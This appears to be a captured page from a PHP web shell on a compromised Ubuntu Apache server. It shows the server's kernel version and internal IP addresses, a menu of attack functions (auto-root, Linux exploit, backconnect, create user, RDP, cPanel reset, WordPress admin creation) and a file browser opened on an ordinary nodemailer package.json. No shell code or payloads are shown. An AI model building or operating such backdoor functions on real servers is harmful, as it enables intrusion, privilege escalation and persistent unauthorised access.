Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
nodemailer /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxrwxr-x
.gitattributes
95
B
-rw-rw-r--
.ncurc.js
121
B
-rw-rw-r--
.prettierrc.js
156
B
-rw-rw-r--
CHANGELOG.md
27.18
KB
-rw-rw-r--
CODE_OF_CONDUCT.md
3.27
KB
-rw-rw-r--
LICENSE
935
B
-rw-rw-r--
README.md
5.11
KB
-rw-rw-r--
SECURITY.txt
1.02
KB
-rw-rw-r--
package.json
1.32
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "nodemailer", "version": "6.9.10", "description": "Easy as cake e-mail sending from your Node.js applications", "main": "lib/nodemailer.js", "scripts": { "test": "node --test --test-concurrency=1 test/**/*.test.js test/**/*-test.js", "test:coverage": "c8 node --test --test-concurrency=1 test/**/*.test.js test/**/*-test.js", "lint": "eslint .", "update": "rm -rf node_modules/ package-lock.json && ncu -u && npm install" }, "repository": { "type": "git", "url": "https://github.com/nodemailer/nodemailer.git" }, "keywords": [ "Nodemailer" ], "author": "Andris Reinman", "license": "MIT-0", "bugs": { "url": "https://github.com/nodemailer/nodemailer/issues" }, "homepage": "https://nodemailer.com/", "devDependencies": { "@aws-sdk/client-ses": "3.484.0", "bunyan": "1.8.15", "c8": "8.0.1", "eslint": "8.56.0", "eslint-config-nodemailer": "1.2.0", "eslint-config-prettier": "9.1.0", "libbase64": "1.2.1", "libmime": "5.2.1", "libqp": "2.0.1", "nodemailer-ntlm-auth": "1.0.4", "proxy": "1.0.2", "proxy-test-server": "1.0.0", "smtp-server": "3.13.0" }, "engines": { "node": ">=6.0.0" } }
Close